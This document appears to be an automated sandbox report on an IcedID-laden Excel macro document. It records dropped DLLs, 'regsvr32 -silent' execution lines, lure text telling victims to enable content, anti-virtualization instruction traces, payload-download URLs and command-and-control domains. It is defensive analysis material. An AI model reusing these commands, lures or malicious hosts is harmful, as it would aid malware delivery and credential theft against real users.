Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://img.youtube.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://marketingplatform.google
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://marketingplatform.google.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://media.amazonwebservices.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://p.adsymptotic.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-19K4ETMBBQKFHE49GBTTFX-Content-Ty
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://prod.log.shortbread.aws.dev
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://prod.tools.shortbread.aws.dev
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-static.libsyn.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://static-cdn.jtvnw.net
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://static.doubleclick.net
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://website.spot.ec2.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://www.buzzsprout.com;
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: https://www.linkedin.com
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube-nocookie.com;
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: https://yt3.ggpht.com;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

E-Banking Fraud:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2656, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0	Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1	Screenshot OCR: Enable Content button from the yellow bar above

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_003F1678 NtQuerySystemInformation,

4_2_003F1678

Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_003F1810	4_2_003F1810
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB15D0	4_2_000007FEF8FB15D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB41BF	4_2_000007FEF8FB41BF

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
Source: Joe Sandbox View	Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>

Source: 4.2.regsvr32.exe.b0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.3f0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 00000004.00000002.2091667862.00000000000B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240

Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PI-9823472110866.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCBC7.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: PI-9823472110866.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: PI-9823472110866.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: PI-9823472110866.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: PI-9823472110866.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: XTOWN.dll.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85
Source: lsdfik[1].fml.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_003F1E50

4_2_003F1E50

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000003F1E71 second address: 00000000003F1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000003F1EAB second address: 00000000003F1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_003F2434 rdtsc

4_2_003F2434

Source: C:\Windows\System32\regsvr32.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

4_2_003F27BC

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_003F2434 rdtsc

4_2_003F2434

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 143.204.91.74 187	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Domain query: astrocycle.download
Source: C:\Windows\System32\regsvr32.exe	Domain query: aws.amazon.com
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.67.213.115 80	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_003F22DC LookupAccountNameW,

4_2_003F22DC

Stealing of Sensitive Information:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2656, type: MEMORY

Remote Access Functionality:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2656, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery211	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery22	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.buzzsprout.com;	0%	Avira URL Cloud	safe
http://astrocycle.download/	0%	Avira URL Cloud	safe
http://crl.sca1b.amazontrus	0%	URL Reputation	safe
http://crl.sca1b.amazontrus	0%	URL Reputation	safe
http://crl.sca1b.amazontrus	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-19K4ETMBBQKFHE49GBTTFX-Content-Ty	0%	Avira URL Cloud	safe
http://uppercilio.fun/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	0%	Avira URL Cloud	safe
http://thousandsyears.download/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://amazonwebservices.d2.sc.omtrdc.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://112-tzm-766.mktoutil.com	0%	Avira URL Cloud	safe
https://dc.ads.linke	0%	Avira URL Cloud	safe
https://download.stormacq.com/aws/podcast/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
astrocycle.download	0%	Avira URL Cloud	safe
https://chtbl.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
uppercilio.fun	172.67.146.88	true	false	unknown
thousandsyears.download	172.67.198.51	true	false	unknown
voopeople.fun	104.21.12.122	true	false	unknown
astrocycle.download	172.67.213.115	true	true	unknown
dr49lng3n1n2s.cloudfront.net	143.204.91.74	true	false	high
aws.amazon.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://astrocycle.download/	true	Avira URL Cloud: safe	unknown
http://uppercilio.fun/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
